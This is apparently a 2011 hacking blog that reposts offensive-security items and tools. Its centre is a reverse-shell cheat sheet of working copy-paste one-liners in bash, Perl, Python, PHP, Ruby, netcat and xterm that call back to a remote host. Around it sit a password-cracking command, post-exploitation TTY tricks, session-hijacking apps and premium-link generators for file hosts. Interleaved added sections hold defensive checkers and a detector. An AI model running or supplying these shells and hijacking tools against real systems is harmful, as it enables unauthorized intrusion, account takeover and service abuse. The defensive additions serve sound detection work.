Sep 17, 2011

Droidsheep : Android Application for Session Hijacking


DroidSheep is a free alternative to FaceNiff, available for free from the DroidSheep download website. It is a one-click session hijacking tool which supports:
  • Amazon.de
  • facebook.com
  • flickr.com
  • twitter.com
  • linkedin.com
  • yahoo.com
  • live.com
  • google.de (only the non-encrypted services like "maps")
What do you need to run DroidSheep?
  • You need an Android-powered device running at least version 2.1 of Android
  • You need root access on your phone (link)
  • You need DroidSheep (you can get it in the "GET IT" section)
If you want to download this app, please go to the Source.
Source: http://thehackernews.com/2011/09/droidsheep-android-application-for.html#.TnOyVR3TA6I.facebook

If you like my blog, Please Donate Me

Sep 15, 2011

List of Rogue Certificates Created in the DigiNotar Incident

After the attackers compromised the DigiNotar CA, they issued many rogue certificates that can be used for man-in-the-middle attacks, phishing websites, and so on.


This post links to the list of rogue certificates that were issued in this incident.

Please revoke these keys or certificates if you added them in the past.

Download Link: https://svn.torproject.org/svn/projects/misc/diginotar/rogue-certs-2011-09-04.csv
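One way to act on such a list, as an added example that is not part of the original post: load a CSV of rogue certificates and check the (issuer, serial, subject) of certificates you have observed or trusted against it. The CSV columns and all serial numbers below are constructed for illustration; the real list linked above has its own layout.

```python
"""Check observed TLS certificates against a list of rogue CA-issued certificates.

Added example, not part of the original post. The CSV layout is an assumption for
illustration; the real rogue-cert list has its own columns.
"""
import csv
import io

# Constructed sample in the assumed layout: issuer CN, serial number (hex), subject CN.
# Serial numbers here are made up; they show the formats one meets in practice.
ROGUE_CSV = """issuer,serial,subject
DigiNotar Public CA 2025,05e2e6a4cd09ea54d665b075fe22a256,*.google.com
DigiNotar Public CA 2025,0a:8b:45:19:38:c1:7e:2d,*.torproject.org
DigiNotar Cyber CA,00:C4:2E:1F,login.yahoo.com
"""

def normalize_serial(serial):
    """Serials appear as bare hex, colon-separated or upper-case; compare them in one form."""
    return serial.replace(":", "").replace(" ", "").lower().lstrip("0") or "0"

def load_rogue_list(csv_text):
    """Return a set of (issuer, serial) pairs plus a set of rogue subject names."""
    pairs, subjects = set(), set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        pairs.add((row["issuer"].strip(), normalize_serial(row["serial"])))
        subjects.add(row["subject"].strip().lower())
    return pairs, subjects

def check_certificate(issuer, serial, subject, rogue):
    """Classify one observed certificate: 'rogue' (issuer and serial match the list),
    'suspicious' (a listed subject name issued by any DigiNotar CA, e.g. a cert the
    list does not yet know about) or 'ok'."""
    pairs, subjects = rogue
    if (issuer, normalize_serial(serial)) in pairs:
        return "rogue"
    if subject.lower() in subjects and issuer.startswith("DigiNotar"):
        return "suspicious"
    return "ok"

if __name__ == "__main__":
    rogue = load_rogue_list(ROGUE_CSV)
    print(check_certificate("DigiNotar Cyber CA", "C42E1F", "login.yahoo.com", rogue))
```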





iPhone secret codes | iPhone tricks


The list of secret codes is given below:

Code            Action
*#06#           Display the IMEI number of the phone
*225#           Display the balance details of a postpaid number
*#43#           Check whether call waiting is enabled
*#61#           Check the forwarding number for unanswered calls
*#62#           Check the forwarding number used when no service is available
*#67#           Check the forwarding number used when the phone is busy
*#646#          Display the minute details of a postpaid number
*777#           Display the balance details of a prepaid number
*3001#12345#*   Display the iPhone's internal settings
*#33#           Check whether barring is enabled or disabled for outgoing calls
*#21#           Display the settings for your call forwarding


Source:  http://tricksndtricks.blogspot.com/2011/09/iphone-secret-codes-iphone-tricks.html



Links to Download Slides and White Papers from DEF CON 19

DEF CON is one of the oldest continuously running hacker conventions around, and also one of the largest.

The slides from DEF CON 19 are now available for download.

Download Link:  https://www.defcon.org/html/links/dc-archives/dc-19-archive.html


FileServe, Filesonic and Wupload premium link generator

FileServe, Filesonic and Wupload are some famous file hosting websites, and you need a premium account for unlimited, fast downloads. Today I have an online tool which generates premium links for these three file hosting websites. I have already posted some other tools and online services for hacking and getting premium links for file hosting services. This is a new one which I found online.


Go to these links and enjoy:



fileserve:

http://generatory.3xg.pl/fileserve

filesonic:

http://generatory.3xg.pl/filesonic

wupload:

http://generatory.3xg.pl/wupload


Source:  http://www.hackingtricks.in/2011/06/fileserve-filesonic-and-wupload-pemium.html



Sep 12, 2011

Multiple Dictionaries or Wordlists Using John the Ripper

If you want the details, please go to the Source.

John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John's stdin function but I like to run rules against my lists and I didn't see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt

Source: http://www.room362.com/blog/2011/9/12/multiple-dictionaries-or-wordlists-using-john-the-ripper.html



Post-Exploitation Without A TTY


Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
 
The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password:  mypassword
localhost ~ #
 
Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
sh: no job control in this shell
sh-3.2$ ssh localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
<big pause>
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
sh: no job control in this shell
sh-3.2$ ssh -T localhost
<big pause>
 
After we run sh.exp we are able to use the ssh client as normal:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
sh: no job control in this shell
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ ssh localhost
ssh localhost
Password: mypassword
Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1

user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s glob.  It should be effective against gentoo systems at least because the gentoo package management runs on python.

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ python -c 'import pty; pty.spawn("/bin/sh")'
sh-3.2$ su -
su -
Password:
localhost ~ #
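The reason "su: must be run from a terminal" appears, shown as an added example that is not from the original post: su, login and ssh check whether their standard input is a terminal, and in a plain reverse shell it is a pipe or socket. The script below runs a small Python child in place of su, once with stdin on a pipe and once behind a pseudo-terminal (what pty.spawn and the Expect script provide), and reports what the child sees. It assumes a POSIX system with /dev/ptmx available.

```python
"""Why su/ssh refuse to work in a plain reverse shell: the child's stdin is a pipe,
not a terminal, until a pseudo-terminal (pty.spawn, Expect) sits in between.

Added example, not from the original post. A Python child stands in for su and
reports what os.isatty() sees; requires a POSIX system with /dev/ptmx.
"""
import os
import subprocess
import sys

# The child does the same check su/login perform before prompting: is fd 0 a terminal?
CHILD = "import os, sys; sys.exit(0 if os.isatty(0) else 1)"

def child_sees_tty(use_pty):
    """Run the check with stdin on a pipe (use_pty=False) or on a pty slave (use_pty=True)."""
    if not use_pty:
        proc = subprocess.run([sys.executable, "-c", CHILD], stdin=subprocess.PIPE,
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return proc.returncode == 0
    # The master side stays with us, exactly as the pty.spawn / Expect parent keeps it;
    # the child gets the slave side as its controlling-terminal-like stdin.
    master, slave = os.openpty()
    try:
        proc = subprocess.run([sys.executable, "-c", CHILD], stdin=slave,
                              stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    finally:
        os.close(master)
        os.close(slave)
    return proc.returncode == 0

def tty_report():
    """Return {'pipe': False, 'pty': True} on a working system."""
    return {"pipe": child_sees_tty(False), "pty": child_sees_tty(True)}

if __name__ == "__main__":
    print(tty_report())
```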


Source: http://pentestmonkey.net/blog/post-exploitation-without-a-tty



Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port.  This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems.  Some of the examples below should also work on Windows if you substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste.  As such they’re quite short lines, but not very readable.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:
 
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL reverse shell here.

Python

This was tested under Linux / Python 2.7:
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…
 
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems, and even if it is there are several versions of netcat, some of which don’t support the -e option.
 
nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm

One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.
 
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):
 
Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):
 
 xhost +targetip
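The defender's counterpart to this cheat sheet, as an added example that is not part of the original page: detection logic that recognises the command-line shapes listed above (the /dev/tcp redirect, nc -e, the mkfifo pipe, scripting-language socket+exec one-liners and the xterm callback) in process command lines such as auditd execve records or shell history. The sample lines are constructed, and the patterns cover only the shapes shown on this page.

```python
"""Detect the reverse-shell one-liner shapes from this cheat sheet in command lines.

Added example, not from the original page. Sample command lines are constructed;
the patterns are deliberately limited to the techniques shown on the page.
"""
import re

# Each pattern names one technique from the cheat sheet.
REVERSE_SHELL_PATTERNS = {
    "bash /dev/tcp redirect": re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "netcat -e": re.compile(r"\bnc(at)?\b.*\s-e\s+/bin/(ba)?sh"),
    "mkfifo + netcat pipe": re.compile(r"mkfifo\s+\S+.*\|\s*nc(at)?\s"),
    "socket + exec one-liner": re.compile(
        r"\b(perl|python\d?|ruby|php)\b.*\b(socket|fsockopen|TCPSocket)\b.*\b(exec|subprocess|dup2)\b"),
    "xterm -display callback": re.compile(r"\bxterm\b.*-display\s+\d{1,3}(\.\d{1,3}){3}:\d+"),
}

def classify_command(cmdline):
    """Return the names of the techniques a command line matches ([] when none)."""
    return [name for name, rx in REVERSE_SHELL_PATTERNS.items() if rx.search(cmdline)]

# Constructed sample lines; the first two are benign uses of the same tools.
SAMPLE_COMMANDS = [
    "nc -z -v 10.0.0.5 443",
    "python -c 'import json,sys; print(json.load(sys.stdin))'",
    "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f",
    "xterm -display 10.0.0.1:1",
]

def scan(commands=SAMPLE_COMMANDS):
    """Map each command line to its matched technique names; benign lines map to []."""
    return {cmd: classify_command(cmd) for cmd in commands}

if __name__ == "__main__":
    for cmd, hits in scan().items():
        print("ALERT" if hits else "ok   ", hits, cmd)
```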
 
Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 



Sep 11, 2011

Post Exploitation Command Lists

This post is a very interesting article from room362, so please go to the Source.

I've had a private list of commands that I run on Windows or Linux when I pop a shell, as I'm sure most pentesters do. It isn't so much a thing of hoarding as it is just jumbled notes that are 'not worth posting'.
Well, I made two (now 3) public Google docs (anyone can edit) *don't be a dick clause
Linux/Unix/BSD Post Exploitation:
https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
Windows Post Exploitation:
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
and newly added OSX Post Exploitation:
https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

Source: http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html





Firesheep Extended!

Firesheep is a Firefox extension that demonstrates HTTP session hijacking attacks. You can hijack private accounts on Facebook, Twitter, and other websites that employ weak HTTP protection strategies.

Changes in Firesheep Extended:

This version, modified by Alcatel-Lucent Bell Labs, focuses on Web applications such as Google Search that verify only the (unsecured) user's session to render personalization features. The tool hijacks such sessions simply by capturing the corresponding “sid cookie”. It basically shows how the “sid cookie” could be misused by an attacker, providing unauthorized access to the Google Search personalized results and history!
The authors extended Firesheep to implement the HTTP information leakage attack. Thanks to Firesheep's modularity, they could easily add a module that performs the attack on the sessions hijacked by the original code. As a result, when a Google “sid cookie” is captured, the account name appears in the Firesheep sidebar. Double clicking on it starts the attack; double clicking again displays the retrieved list of visited links!
The only ways to avoid this attack were to sign out of Google accounts when connecting from a shared network, or to use a VPN to encrypt the traffic and prevent cookie interception.
After downloading the extension you might be presented with a prompt that it is not compatible with your version of Firefox. This is because of the following piece of code in install.rdf:
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <!-- Firefox -->
<em:minVersion>3.6.10</em:minVersion>
<em:maxVersion>5.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
You need to change the “5.*” to “6.*” if you use the latest version of Firefox. You can read the paper that was released with this tool here – http://arxiv.org/pdf/1108.5864v1
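Both the DroidSheep post above and this one hijack session cookies that the browser sends over unencrypted HTTP. The check a site owner would want, as an added example that is not part of either original post: audit Set-Cookie headers for session cookies that lack the Secure attribute (and so travel over http:// as well) or HttpOnly. The header lines and cookie names are constructed; the attribute names are the standard ones from RFC 6265.

```python
"""Audit Set-Cookie headers for the weakness Firesheep and DroidSheep exploit: a session
cookie that the browser will also send over plain HTTP, where it can be sniffed.

Added example, not from the original posts. Sample headers and cookie names are
constructed; Secure and HttpOnly are the standard RFC 6265 attributes.
"""

# Cookie names treated as session identifiers (the post's "sid cookie" among them).
SESSION_NAME_HINTS = ("sid", "sess", "session", "auth", "token", "phpsessid")

def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, {attribute: value}), attributes lower-cased."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs

def audit_set_cookie(header_value, served_over_https=True):
    """Return a list of findings for one Set-Cookie header (empty list means fine)."""
    name, attrs = parse_set_cookie(header_value)
    findings = []
    if not any(hint in name.lower() for hint in SESSION_NAME_HINTS):
        return findings                      # not a session cookie; nothing to hijack
    if not served_over_https:
        findings.append(f"{name}: session cookie set over plain HTTP")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (will be sent over http:// URLs)")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable by page scripts)")
    return findings

# Constructed sample: an unprotected SID cookie like the one in the post, a hardened
# version of it, and a harmless preference cookie. Second field: was the response HTTPS?
SAMPLE_HEADERS = [
    ("SID=abc123; Domain=.example.com; Path=/", False),
    ("SID=abc123; Domain=.example.com; Path=/; Secure; HttpOnly", True),
    ("PREF=lang%3Den; Path=/", False),
]

def audit_all(samples=SAMPLE_HEADERS):
    """Map each sample header to its findings."""
    return {header: audit_set_cookie(header, https) for header, https in samples}

if __name__ == "__main__":
    for header, findings in audit_all().items():
        print(header, "->", findings or "ok")
```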

If you want to download this addon, please go to the Source.

Source: http://www.pentestit.com/2011/09/10/update-firesheep-extended/ 

 
